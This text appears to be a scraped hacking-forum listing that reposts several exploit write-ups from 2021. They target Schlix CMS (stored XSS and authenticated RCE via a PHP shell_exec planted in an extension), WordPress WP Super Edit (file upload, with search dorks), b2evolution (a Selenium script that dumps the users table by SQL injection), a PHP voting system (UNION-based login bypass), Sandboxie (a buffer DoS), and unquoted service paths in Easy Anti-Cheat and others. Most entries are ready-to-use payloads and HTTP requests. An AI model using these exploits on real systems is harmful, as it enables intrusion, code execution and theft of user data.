    # Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-05 # Exploit Author: Emircan Baş # Vendor Homepage: https://www.schlix.com/ # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip # Version: 2.2.6-6 # Tested on: Windows & WampServer ==> Tutorial <== 1- Login with your account. 2- Go to the contacts section. Directory is '/admin/app/contact'. 3- Create a new category and type an XSS payload into the category title. 4- XSS payload will be executed when we travel to created page. ==> Vulnerable Source Code <== <article class="main category"> <div class="media-header-full-width " style="background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');"> <div class="media-header-title container d-flex h-100"> <div class="row align-self-center w-100"> <div class="col-8 mx-auto"> <div class="text-center"> <h1 class="item title" itemprop="headline">&#039;"><script>alert(1)</script></h1> # OUR PAYLOAD IS NON-EXECUTEABLE </div> </div> </div> </div> </div> <div class="breadcrumb-bg"> <div class="container"> <div class="breadcrumb-container"><ol class="breadcrumb"><li class="breadcrumb-item"><a class="breadcrumb-home" href="/cms"> <i class="fa fa-home"></i></a></li><li class="breadcrumb-item"><a href="/cms/contacts/">Contacts</a></li><li class="breadcrumb-item"> <a href="/cms/contacts/script-alert-2-script/"><script>alert(1)</script></a></li></ol></div></div> # EXECUTED PLACE </div> ==> HTTP Request <== POST /admin/app/contacts?action=savecategory HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489 Content-Length: 4146 Origin: (ORIGIN) Connection: close Referer: (REFERER) Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 Upgrade-Insecure-Requests: 1 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="_csrftoken" 49feefcd2b917b9855cd55c8bd174235fa5912e4 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cid" 6 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="parent_id" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="guid" ee34f23a-7167-a454-8576-20bef7575c15 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="title" <script>alert(1)</script> -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="status" 1 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="virtual_filename" script-alert-1-script -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="summary" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="description" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="meta_description" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="meta_key" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="tags" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="date_available" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="date_expiry" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="items_per_page" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" display_pagetitle -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" __null__ -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" display_child_categories -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" __null__ -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" display_items -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" __null__ -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[child_categories_sortby]" date_created -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[items_sortby]" date_created -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_read_everyone" everyone -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_read[]" 1 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_read[]" 2 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_read[]" 3 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_write[]" 1 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cmh_media_selection" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cmh_media_upload"; filename="" Content-Type: application/octet-stream -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cmh_media_path" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cmh_media_url" -----------------------------280033592236615772622294478489--
  18. HireHackking

    Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Title: Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload # Author: h4shur # date: 2021-05-06 # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/plugins/wp-super-edit/ # Version : 2.5.4 and earlier # Tested on: Windows 10 & Google Chrome # Category : Web Application Bugs # Dork : # inurl:"wp-content/plugins/wp-super-edit/superedit/" # inurl:"wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/" ### Note: # 1. Technical Description: This plugin allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored. # 2. Technical Description: WordPress Plugin "wp-super-edit" allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. This vulnerability is caused by FCKeditor in this plugin. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored. ### POC: * Exploit 1 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/browser.html * Exploit 2 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/connectors/test.html * Exploit 3 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/test.html * Exploit 4 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/frmupload.html
  19. HireHackking

    Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated) # Date: 2021-05-06 # Exploit Author: Eren Saraç # Vendor Homepage: https://www.schlix.com/ # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip # Version: 2.2.6-6 # Tested on: Windows & WampServer ==> Tutorial <== 1- Login with your account. 2- Go to the block management section. Directory is '/admin/app/core.blockmanager'. 3- Create a new category. 4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp 5- Open the 'packageinfo.inc' file. It is in '/blocks/mailchimp' directory. 6- Paste this PHP code below and save it. ##################################### $command = shell_exec('netstat -an'); echo "<pre>$command</pre>"; ?> ##################################### 7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'. 8- Install a package to created category and enter the installed 'mailchimp' extension. 9- Click the 'About' tab and our php code will be executed. ==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <== <?php $name = 'mailchimp'; $type = 'block'; $guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3'; $version = '1.0'; $license = 'MIT'; $description = 'Mailchimp is the leading email marketing platform, that lets you send out fully customized email and newsletter campaigns to your subscribers. It is an imperative tool to build and follow through on your sales funnel, and helps you create and maintain lasting relations with your site visitors and customers.'; $author = 'Alip'; $url = 'https://github.com/calip/app_mailchimp'; $email = 'asalip.putra@gmail.com'; $copyright = 'Copyright &copy;2019 calip'; $command = shell_exec('netstat -an'); echo "<pre>$command</pre>"; ?> ==> HTTP Request (ZIP Extension Installation) <== POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Schlix-Ajax: 1 Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130 Content-Length: 51585 Origin: http(s)://(ORIGIN) Connection: close Referer: http(s)://(REFERER)/admin/app/core.blockmanager Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="_csrftoken" a3b9a0da8d6be08513f60d1744e2642df0702ff7 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip" Content-Type: application/x-zip-compressed ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="MAX_FILE_SIZE" 2097152 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="zipfileupload__total_file_size" 0 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="zipfileupload__max_file_count" 20 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="password" # Your ACC Password. -----------------------------29322337091578227221515354130-- ==> HTTP Request (RCE - About Tab) <== GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http(s)://(HOST)/ Connection: close Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 Upgrade-Insecure-Requests: 1 ==> HTTP Response (RCE - About Tab) <== HTTP/1.1 200 OK Date: Wed, 05 May 2021 21:49:24 GMT Server: Apache/2.4.46 (Win64) PHP/7.3.21 X-Powered-By: PHP/7.3.21 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 49575 <!DOCTYPE html> <html> <body> <div id="tab_options" class="schlixui-childtab"> <pre> Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:80 0.0.0.0:0 LISTENING TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:902 0.0.0.0:0 LISTENING TCP 0.0.0.0:912 0.0.0.0:0 LISTENING TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING TCP 0.0.0.0:3307 0.0.0.0:0 LISTENING TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING TCP 0.0.0.0:50296 0.0.0.0:0 LISTENING TCP 127.0.0.1:80 127.0.0.1:58843 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58853 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58854 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58859 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58860 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58865 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58868 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58883 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58893 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58894 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58899 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58902 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58908 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58918 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58919 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58924 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58886 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58887 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58888 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58891 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58905 CLOSE_WAIT TCP 127.0.0.1:8080 127.0.0.1:58907 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58911 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58913 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58915 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58916 TIME_WAIT TCP 127.0.0.1:58424 127.0.0.1:58425 ESTABLISHED TCP 127.0.0.1:58425 127.0.0.1:58424 ESTABLISHED TCP 127.0.0.1:58435 127.0.0.1:58436 ESTABLISHED TCP 127.0.0.1:58436 127.0.0.1:58435 ESTABLISHED TCP 127.0.0.1:58565 127.0.0.1:58566 ESTABLISHED TCP 127.0.0.1:58566 127.0.0.1:58565 ESTABLISHED TCP 127.0.0.1:58639 127.0.0.1:58640 ESTABLISHED TCP 127.0.0.1:58640 127.0.0.1:58639 ESTABLISHED TCP 169.254.22.167:139 0.0.0.0:0 LISTENING TCP 169.254.224.26:139 0.0.0.0:0 LISTENING TCP 192.168.1.8:139 0.0.0.0:0 LISTENING TCP 192.168.1.8:49500 95.101.14.77:443 ESTABLISHED TCP 192.168.1.8:57059 162.159.129.235:443 ESTABLISHED TCP 192.168.1.8:57902 162.159.138.234:443 ESTABLISHED TCP 192.168.1.8:58453 44.235.189.138:443 ESTABLISHED TCP 192.168.1.8:58626 162.159.138.232:443 ESTABLISHED TCP 192.168.1.8:58627 162.159.133.234:443 ESTABLISHED TCP 192.168.1.8:58699 162.159.135.232:443 ESTABLISHED TCP 192.168.1.8:58841 20.44.232.74:443 ESTABLISHED TCP 192.168.1.8:58942 162.159.138.232:443 ESTABLISHED TCP 192.168.1.8:58951 138.68.92.190:443 ESTABLISHED TCP 192.168.1.8:60549 51.103.5.159:443 ESTABLISHED TCP 192.168.1.8:60610 104.66.70.197:443 ESTABLISHED TCP 192.168.1.8:60611 104.66.70.197:443 ESTABLISHED TCP 192.168.1.8:60612 217.31.233.104:443 CLOSE_WAIT TCP [::]:80 [::]:0 LISTENING TCP [::]:135 [::]:0 LISTENING TCP [::]:445 [::]:0 LISTENING TCP [::]:3306 [::]:0 LISTENING TCP [::]:3307 [::]:0 LISTENING TCP [::]:7680 [::]:0 LISTENING TCP [::]:49664 [::]:0 LISTENING TCP [::]:49665 [::]:0 LISTENING TCP [::]:49666 [::]:0 LISTENING TCP [::]:49667 [::]:0 LISTENING TCP [::]:49668 [::]:0 LISTENING TCP [::]:50296 [::]:0 LISTENING TCP [::1]:3306 [::1]:58845 TIME_WAIT TCP [::1]:3306 [::1]:58856 TIME_WAIT TCP [::1]:3306 [::1]:58857 TIME_WAIT TCP [::1]:3306 [::1]:58858 TIME_WAIT TCP [::1]:3306 [::1]:58932 TIME_WAIT TCP [::1]:3306 [::1]:58935 TIME_WAIT TCP [::1]:3306 [::1]:58940 TIME_WAIT TCP [::1]:3306 [::1]:58950 TIME_WAIT TCP [::1]:3306 [::1]:58953 ESTABLISHED TCP [::1]:3306 [::1]:58954 ESTABLISHED TCP [::1]:49485 [::1]:49486 ESTABLISHED TCP [::1]:49486 [::1]:49485 ESTABLISHED TCP [::1]:49669 [::]:0 LISTENING TCP [::1]:58844 [::1]:3306 TIME_WAIT TCP [::1]:58845 [::1]:3306 TIME_WAIT TCP [::1]:58855 [::1]:3306 TIME_WAIT TCP [::1]:58856 [::1]:3306 TIME_WAIT TCP [::1]:58857 [::1]:3306 TIME_WAIT TCP [::1]:58858 [::1]:3306 TIME_WAIT TCP [::1]:58861 [::1]:3306 TIME_WAIT TCP [::1]:58862 [::1]:3306 TIME_WAIT TCP [::1]:58863 [::1]:3306 TIME_WAIT TCP [::1]:58864 [::1]:3306 TIME_WAIT TCP [::1]:58866 [::1]:3306 TIME_WAIT TCP [::1]:58867 [::1]:3306 TIME_WAIT TCP [::1]:58869 [::1]:3306 TIME_WAIT TCP [::1]:58870 [::1]:3306 TIME_WAIT TCP [::1]:58884 [::1]:3306 TIME_WAIT TCP [::1]:58885 [::1]:3306 TIME_WAIT TCP [::1]:58929 [::1]:3306 TIME_WAIT TCP [::1]:58930 [::1]:3306 TIME_WAIT TCP [::1]:58931 [::1]:3306 TIME_WAIT TCP [::1]:58932 [::1]:3306 TIME_WAIT TCP [::1]:58934 [::1]:3306 TIME_WAIT TCP [::1]:58935 [::1]:3306 TIME_WAIT TCP [::1]:58939 [::1]:3306 TIME_WAIT TCP [::1]:58940 [::1]:3306 TIME_WAIT TCP [::1]:58946 [::1]:3306 TIME_WAIT TCP [::1]:58947 [::1]:3306 TIME_WAIT TCP [::1]:58949 [::1]:3306 TIME_WAIT TCP [::1]:58950 [::1]:3306 TIME_WAIT TCP [::1]:58953 [::1]:3306 ESTABLISHED TCP [::1]:58954 [::1]:3306 ESTABLISHED UDP 0.0.0.0:5050 *:* UDP 0.0.0.0:5353 *:* UDP 0.0.0.0:5355 *:* UDP 0.0.0.0:53240 *:* UDP 0.0.0.0:53241 *:* UDP 127.0.0.1:1900 *:* UDP 127.0.0.1:62353 *:* UDP 127.0.0.1:63129 *:* UDP 192.168.1.8:137 *:* UDP 192.168.1.8:138 *:* UDP 192.168.1.8:1900 *:* UDP 192.168.1.8:2177 *:* UDP 192.168.1.8:63128 *:* UDP [::]:5353 *:* UDP [::]:5355 *:* UDP [::1]:1900 *:* UDP [::1]:63125 *:* UDP [fe80::e4d5:62f5:da3:2dae%21]:1900 *:* UDP [fe80::e4d5:62f5:da3:2dae%21]:2177 *:* UDP [fe80::e4d5:62f5:da3:2dae%21]:63124 *:* </pre> <div class="content"> <div class="row"> <div class="col-xs-12"> <div class="text-center"> <h1>mailchimp</h1> <p>v1.0</p><p>Author: <a href="mailto:asalip.putra@gmail.com">Alip</a></p> <p>Web: <a href="https://github.com/calip/app_mailchimp">https://github.com/calip/app_mailchimp</a></p> <p><a href="/cms/admin/app/core.blockmanager?action=uninstall&name=mailchimp"><i class="fa fa-times-circle"></i>Uninstall</a></p> </div> </div> </div> </div> </div> </body>
  20. HireHackking

    Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation # Date: 04.05.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.epicgames.com https://www.easy.ac Epic Games Easy Anti-Cheat 4.0 Local Privilege Escalation Vendor: Epic Games, Inc. Product web page: https://www.epicgames.com https://www.easy.ac Affected version: 4.0.0.0 Summary: Easy Anti-Cheat is the industry-leading anti–cheat service, countering hacking and cheating in multiplayer PC games through the use of hybrid anti–cheat mechanisms. Desc: The application suffers from an unquoted search path issue impacting the service 'EasyAntiCheat' for Windows deployed as part of Easy Anti-Cheat Service application. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. Tested on: Microsoft Windows 10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5652 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5652.php 04.05.2021 -- C:\Users>sc qc EasyAntiCheat [SC] QueryServiceConfig SUCCESS SERVICE_NAME: EasyAntiCheat TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : EasyAntiCheat DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  21. HireHackking

    b2evolution 7-2-2 - 'cf_name' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: b2evolution 7-2-2 - 'cf_name' SQL Injection # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty # Date: 05.06.2021 # Vendor: https://b2evolution.net/ # Link: https://b2evolution.net/downloads/7-2-2 # CVE: CVE-2021-28242 # Proof: https://streamable.com/x51kso [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-28242 from selenium import webdriver import time # Vendor: https://typo3.org/ website_link=" http://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link" # enter your login username username="admin" # enter your login password password="FvsDq7fmHvWF" #enter the element for username input field element_for_username="x" #enter the element for password input field element_for_password="q" #enter the element for submit button element_for_submit="login_action[login]" browser = webdriver.Chrome() #uncomment this line,for chrome users #browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] #browser = webdriver.Firefox() #uncomment this line,for chrome users browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() # Exploit vulnerability MySQL obtain sensitive database information by injecting SQL commands into the "cf_name" parameter time.sleep(7) # Receaving sensitive info for evo_users browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")) time.sleep(7) # Receaving sensitive info for evo_blogs browser.get((" http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")) time.sleep(7) # Receaving sensitive info for evo_section browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")) time.sleep(7) browser.close() print("At the time, of the exploit, you had to see information about the tables...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Sorry, your exploit is not working for some reasons...")
  22. HireHackking

    Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2020-05-06 # Vendor Homepage: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Plus-x64-v0.7.4.exe # Tested Version: 0.7.4 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Sandboxie Service" | findstr /i /v """ Sandboxie Service SbieSvc C:\Program Files\Sandboxie-Plus\SbieSvc.exe Auto # Service info sc qc "SbieSvc" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SbieSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Sandboxie-Plus\SbieSvc.exe GRUPO_ORDEN_CARGA : UIGroup ETIQUETA : 0 NOMBRE_MOSTRAR : Sandboxie Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  23. HireHackking

    WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2020-05-06 # Vendor Homepage: https://www.gearboxcomputers.com/downloads/wifihotspot.exe # Tested Version: 1.0.0.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ MainService WifiHotSpotSvc C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe Auto # Service info sc qc wifihotspotsvc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: wifihotspotsvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : MainService DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  24. HireHackking

    Sandboxie 5.49.7 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC) # Date: 06/05/2021 # Author: Erick Galindo # Vendor Homepage: https://sandboxie-plus.com/ # Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe # Version: 5.49.7 # Tested on: Windows 10 Pro x64 es # Proof of Concept: #1.- Copy printed "AAAAA..." string to clipboard! #2.- Sandboxie Control->Sandbox->Set Container Folder #3.- Paste the buffer in the input then press ok buffer = "\x41" * 5000 f = open ("Sandboxie10.txt", "w") f.write(buffer) f.close()
  25. HireHackking

    Voting System 1.0 - Authentication Bypass (SQLI)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI) # Date: 06/05/2021 # Exploit Author: secure77 # Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB You can simply bypass the /admin/login.php with the following sql injection. All you need is a bcrypt hash that is equal with your random password, the username should NOT match with an existing ########################### Vulnerable code ############################ if(isset($_POST['login'])){ $username = $_POST['username']; $password = $_POST['password']; $sql = "SELECT * FROM admin WHERE username = '$username'"; $query = $conn->query($sql); if($query->num_rows < 1){ $_SESSION['error'] = 'Cannot find account with the username'; } else{ $row = $query->fetch_assoc(); echo "DB Password: " . $row['password']; echo "<br>"; echo "<br>"; echo "Input Password: " . $password; if(password_verify($password, $row['password'])){ echo "Equal"; $_SESSION['admin'] = $row['id']; } else{ echo "not Equal"; $_SESSION['error'] = 'Incorrect password'; } } } else{ $_SESSION['error'] = 'Input admin credentials first'; } ########################### Payload ############################ POST /admin/login.php HTTP/1.1 Host: 192.168.1.1 DNT: 1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=tliephrsj1d5ljhbvsbccnqmff Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 167 login=yea&password=admin&username=dsfgdf' UNION SELECT 1,2,"$2y$12$jRwyQyXnktvFrlryHNEhXOeKQYX7/5VK2ZdfB9f/GcJLuPahJWZ9K",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -